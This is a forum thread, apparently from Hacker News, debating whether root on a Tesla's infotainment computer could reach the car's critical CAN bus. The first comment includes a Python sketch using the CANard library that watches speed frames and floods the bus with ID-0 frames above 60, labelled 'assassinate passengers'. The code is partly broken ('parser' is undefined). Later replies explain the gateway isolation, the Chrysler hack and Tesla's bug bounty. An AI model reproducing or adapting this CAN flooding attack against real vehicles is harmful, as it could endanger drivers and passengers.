[nickysielicki]

I wouldn't be so sure.

I don't know enough about CAN bus to speak authoritatively about this, nor do I know the specifics of what the dashboard has access to, but given that the dash displays information like charge level and speed, I'd guess that the dash is getting that information directly from the CAN.

And I do know that CAN bus is very vulnerable. [1][2]... So you may be able to kill someone through /dev/can0, via a small program running in that chroot.

Eg: In Python

    from canard import can
    from canard.file import jsondb
    from canard.hw import socketcan

    # create and start device
    dev = socketcan.SocketCanDev("/dev/can0")
    dev.start()

    # create our DoS frame
    frame = can.Frame(id=0)
    frame.dlc = 8

    # load tesla can spec, eg: from [4]
    # CAN3, ID 0x0256
    b = parser.parse('tesla.json')

    while True:
      rec = dev.recv()
      speedo = b.parse_frame(rec)
      # assassinate passengers
      if (speedo.speed > 60):
        while True:
          dev.send(frame) 

[1]: https://www.blackhat.com/docs/asia-15/materials/asia-15-Even...

[2]: http://security.stackexchange.com/questions/88724/is-there-a...

[3]: https://github.com/ericevenchick/CANard

[4]: http://skie.net/uploads/TeslaCAN/Tesla%20Model%20S%20CAN%20D...

[regularfry]

Sensible cars have a device bridging high and low security networks, forwarding data from one to the other, specifically so that a misbehaving media device or light system can't clobber the brakes or ECU. No idea if the Tesla does this or not, but it's a fairly standard approach.

[Hemera-]

Yes, it has a gateway between the high level stuff and the low level stuff. It's fairly secure too. You can't just make calls to the can bus all willy-nilly either.

[nickysielicki]

> You can't just make calls to the can bus all willy-nilly either.

What do you mean by that? I would think that once you get UID=0 nothing can stop you from doing whatever you want to that device.

[0942v8653]

It's a completely different computer—compare it to your typical web browser/web server model. The media computer can request display the battery information (the browser can get a list of products) but it cannot hit the accelerator (the browser cannot read other users' personal information). Even if you have root on the media center (your laptop), that doesn't make it so you can run any and all commands on the computer that regulates steering and acceleration (the web server).

[snowwindwaves]

there is a gateway between the media center canbus and the critical canbus. the gateway buffers all the data from the critical canbus and rate limits any requests for data which isn't broadcast regularly on the critical canbus.

You would have to get UID=0 on the canbus gateway to make requests 'willy nilly' on the critical canbus. Having UID=0 on the media centre would only help in making willy nilly requests to the gateway.

edit: clarity

[tacticus]

though wasn't the chrysler attack through one of these gateways?

[NotSammyHagar]

The chrysler was a completely different system, but it was indeed infecting the car from the radio / entertainment system. The tesla is completely different from that. They have one entire computer system that runs the "entertainment console". You can even reboot it while you are driving and nothing happens (this is by design of course). The driving controls are totally separated. The only thing you notice when you reboot that console if that the radio goes off, the display goes black during the reboot (10 seconds). Then it comes back and all is well. Press both turning cylinder controls on the steering wheel for a few seconds to start the reboot. They designed it very well. That doesn't mean it is perfect, but they have approached security correctly as far as I can tell from outside. They pay for exploits too - see https://bugcrowd.com/tesla. They have hired security researchers to work on their system and attack it.

As a tesla owner, I do wish they would hurry up and publish their app platform. They do have apps that they wrote themselves, that come with the car.

And I really wish they'd update their web browser, and even more wish they supported linux. Maybe the chromebook os support will be secure enough for android apps that even tesla could use it.